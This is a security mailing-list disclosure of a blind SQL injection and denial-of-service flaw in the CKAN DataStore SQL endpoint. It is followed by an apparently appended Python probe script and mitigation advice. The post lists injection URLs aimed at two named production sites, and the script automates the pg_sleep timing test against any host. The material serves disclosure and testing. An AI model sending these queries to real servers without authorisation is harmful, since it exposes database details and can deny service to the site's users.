[CKAN-Security] Blind SQL Injection & DOS vulnerability with CKAN DataStore

Philip Ashlock - QXA philip.ashlock at gsa.gov
Thu Jun 7 00:01:42 UTC 2018


It looks like there are some SQL commands that go unsanitized when using
the CKAN DataStore API. In some scenarios this would lead to a blind SQL
injection that could disclose sensitive information in the database, but
I'm not familiar enough with DataStore to test for that. At the very least
the fact that the "sleep()" command is not sanitized does create a denial
of service vulnerability.

Select current_user and version()
https://inventory.data.gov/api/action/datastore_search_sql?sql=SELECT%20current_user,version();
https://data.boston.gov/api/action/datastore_search_sql?sql=SELECT%20current_user,version();

Sleep for 5 seconds
https://inventory.data.gov/api/action/datastore_search_sql?sql=SELECT%20pg_sleep(5);
https://data.boston.gov/api/action/datastore_search_sql?sql=SELECT%20pg_sleep(5);

I noticed that I couldn't recreate this behavior on https://demo.ckan.org
so perhaps this has been addressed with newer versions of CKAN or the
relevant extensions?
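The two checks in the report (the current_user/version() disclosure query, then the pg_sleep timing test) written up as a repeatable probe. This is an added example, not code from the original message and not CKAN's own code. It assumes only what the report's links show: the endpoint path /api/action/datastore_search_sql with an `sql` query parameter, and CKAN's usual JSON envelope of `{"success": ..., "result": {"records": [...]}}`. The simulated server at the bottom is constructed so the probe can be exercised offline; the host name ckan.example is a placeholder.

```python
"""Time-based probe for an SQL-passthrough endpoint such as CKAN's
datastore_search_sql.  Added example, not CKAN code.  Assumed: the
endpoint path and `sql` parameter from the report, and CKAN's JSON
envelope {"success": bool, "result": {"records": [...]}}."""
import json
import re
import sys
import time
import urllib.parse
import urllib.request

ENDPOINT = "/api/action/datastore_search_sql"


def build_url(base_url, sql):
    """URL-encode the statement into the same request shape as the report's links."""
    return base_url.rstrip("/") + ENDPOINT + "?sql=" + urllib.parse.quote(sql, safe="")


def fetch_json(url, timeout=60):
    """Real fetcher: GET the URL and decode the JSON envelope."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def first_record(envelope):
    """Return the first row of a successful response, or None."""
    if not envelope.get("success"):
        return None
    records = envelope.get("result", {}).get("records") or []
    return records[0] if records else None


def timed(fetch, url):
    """Run one request and return (body, elapsed seconds)."""
    start = time.monotonic()
    body = fetch(url)
    return body, time.monotonic() - start


def probe(base_url, delay=5.0, fetch=fetch_json):
    """Issue the report's two queries and compare their timings.

    `disclosed` holds the current_user/version() row if the server ran the
    query at all.  `time_based` is True only when the pg_sleep request both
    succeeded and took roughly `delay` seconds longer than the baseline:
    that is the signal for a time-based blind injection and for the DoS."""
    baseline, t_base = timed(fetch, build_url(base_url, "SELECT current_user, version()"))
    slept, t_sleep = timed(fetch, build_url(base_url, f"SELECT pg_sleep({delay})"))
    accepted = bool(slept.get("success"))
    return {
        "disclosed": first_record(baseline),
        "sleep_accepted": accepted,
        "time_based": accepted and (t_sleep - t_base) >= 0.8 * delay,
    }


def make_simulated_fetch(vulnerable):
    """Constructed stand-in for a CKAN server so the probe runs offline.

    The vulnerable variant executes whatever function is named (it really
    sleeps for pg_sleep); the hardened variant still answers the plain
    SELECT but rejects the pg_sleep statement, as a query filter or a
    server-side statement timeout would."""
    def fetch(url):
        sql = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)["sql"][0]
        m = re.search(r"pg_sleep\(\s*([\d.]+)\s*\)", sql, re.IGNORECASE)
        if m:
            if not vulnerable:
                return {"success": False, "error": {"message": "query rejected"}}
            time.sleep(float(m.group(1)))
            return {"success": True, "result": {"records": [{"pg_sleep": ""}]}}
        return {"success": True, "result": {"records": [
            {"current_user": "ckan_read", "version": "PostgreSQL (simulated)"}]}}
    return fetch


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Live check: only against a host you are authorised to test.
        print(probe(sys.argv[1]))
    else:
        for label, vuln in (("vulnerable", True), ("hardened", False)):
            print(label, probe("https://ckan.example", delay=0.3, fetch=make_simulated_fetch(vuln)))
```

Run with a base URL as the single argument to test a real instance, or with no arguments to see both simulated outcomes. The timing comparison is what distinguishes "the server accepted the statement" from "the server actually executed it", which is the difference between the demo.ckan.org result and the two hosts in the report. On the defensive side the general PostgreSQL mitigations for a passthrough query endpoint are to run it under a low-privilege, read-only database role and to set `statement_timeout` for that session so that pg_sleep, or any other long-running statement, is cut off rather than holding a worker.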